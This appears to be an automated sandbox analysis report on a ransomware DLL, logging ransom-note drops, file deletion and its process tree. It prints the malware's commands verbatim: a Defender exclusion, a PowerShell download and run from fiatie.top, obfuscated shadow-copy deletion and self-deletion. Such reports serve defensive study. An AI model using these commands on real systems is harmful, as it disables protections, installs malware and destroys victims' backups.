Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\0absryc3.default\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\bookmarkbackups\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\crashes\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\crashes\events\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\datareporting\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\datareporting\archived\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\datareporting\archived\2023-10\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\datareporting\glean\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\datareporting\glean\db\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\datareporting\glean\events\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\datareporting\glean\tmp\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\minidumps\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\saved-telemetry-pings\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\security_state\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\sessionstore-backups\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\permanent\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\permanent\chrome\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595amcateirvtisty.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\appdata\roaming\mozilla\firefox\profiles\2o7hffxt.default-release\storage\to-be-removed\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\contacts\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\cookies\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\cookies\dntexception\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\cookies\dntexception\low\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\cookies\ese\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\cookies\low\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\cookies\privacie\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\cookies\privacie\low\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\documents\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\downloads\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\favorites\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\favorites\links\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\links\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\onedrive\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\recent\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\saved games\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\user\searches\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\public\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\public\accountpictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\public\desktop\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\public\documents\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\public\documents\my music\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\public\documents\my pictures\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\public\documents\my videos\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\public\downloads\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\documents and settings\public\libraries\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\perflogs\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: c:\recovery\decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile moved: C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.pdfJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile deleted: C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.pdfJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile moved: C:\Users\user\Desktop\BNAGMGSPLO.jpgJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile deleted: C:\Users\user\Desktop\BNAGMGSPLO.jpgJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile moved: C:\Users\user\Desktop\SUAVTZKNFL\BNAGMGSPLO.xlsxJump to behavior

System Summary

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\t5y6t5.exeJump to dropped file
Source: R7bv9d6gTH.dllStatic PE information: invalid certificate
Source: R7bv9d6gTH.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf.19.drBinary string: \Device\HarddiskVolume3\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf
Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winDLL@69/685@1/1
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Users\user\Desktop\Decryptfiles.txtJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2540:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:592:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0504tgf.ztq.ps1Jump to behavior
Source: R7bv9d6gTH.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile read: \Device\CdRom0\sources\cversion.iniJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll",#1
Source: R7bv9d6gTH.dllVirustotal: Detection: 28%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll",#1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/t5y6t5.exe
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/t5y6t5.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\t5y6t5.exe C:\Users\user\AppData\Local\Temp/t5y6t5.exe
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\t5y6t5.exe "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\MUSKjq\MUSK\..\..\Windows\MUSK\MUSK\..\..\system32\MUSK\MUSK\..\..\wbem\MUSK\MUSKj\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\t5y6t5.exe "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HJKnzu\HJKn\..\..\Windows\HJKn\HJKn\..\..\system32\HJKn\HJKn\..\..\wbem\HJKn\HJKnz\..\..\wmic.exe shadowcopy delete
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\gdzXho\gdzX\..\..\Windows\gdzX\gdzX\..\..\system32\gdzX\gdzX\..\..\wbem\gdzX\gdzXh\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\WUQpVs\WUQp\..\..\Windows\WUQp\WUQp\..\..\system32\WUQp\WUQp\..\..\wbem\WUQp\WUQpV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\WnmQCH\WnmQ\..\..\Windows\WnmQ\WnmQ\..\..\system32\WnmQ\WnmQ\..\..\wbem\WnmQ\WnmQC\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exeJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%/t5y6t5.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\t5y6t5.exe C:\Users\user\AppData\Local\Temp/t5y6t5.exe
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\WUQpVs\WUQp\..\..\Windows\WUQp\WUQp\..\..\system32\WUQp\WUQp\..\..\wbem\WUQp\WUQpV\..\..\wmic.exe shadowcopy deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\MUSKjq\MUSK\..\..\Windows\MUSK\MUSK\..\..\system32\MUSK\MUSK\..\..\wbem\MUSK\MUSKj\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\gdzXho\gdzX\..\..\Windows\gdzX\gdzX\..\..\system32\gdzX\gdzX\..\..\wbem\gdzX\gdzXh\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HJKnzu\HJKn\..\..\Windows\HJKn\HJKn\..\..\system32\HJKn\HJKn\..\..\wbem\HJKn\HJKnz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\WnmQCH\WnmQ\..\..\Windows\WnmQ\WnmQ\..\..\system32\WnmQ\WnmQ\..\..\wbem\WnmQ\WnmQC\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
